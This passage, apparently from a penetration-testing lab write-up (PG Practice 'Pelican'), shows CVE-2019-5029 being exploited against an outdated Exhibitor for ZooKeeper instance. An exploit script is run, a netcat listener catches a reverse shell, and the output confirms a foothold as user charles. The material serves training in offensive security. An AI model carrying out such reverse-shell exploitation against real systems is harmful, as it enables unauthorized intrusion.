CVE-2019-5029
The target Exhibitor for Zookeeper instance has been suspected to be vulnerable to CVE-2019-5029 due to its version being severely old.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pelican]
└─$ bash CVE-2019-5029.sh $IP 8080 $tun0 2181
------------------------------------------------------------------------------
Original exploit : https://www.exploit-db.com/exploits/48654
----------------This bash script is edited by @thehunt1s0n--------------------
Curl command executed successfully, check your listener.Executing the Bash script
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pelican]
└─$ nnc 2181
listening on [any] 2181 ...
connect to [192.168.45.192] from (UNKNOWN) [192.168.132.98] 35610
whoami
charles
hostname
pelican
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:ad:8f brd ff:ff:ff:ff:ff:ff
inet 192.168.132.98/24 brd 192.168.132.255 scope global noprefixroute ens192
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the charles user via exploiting CVE-2019-5029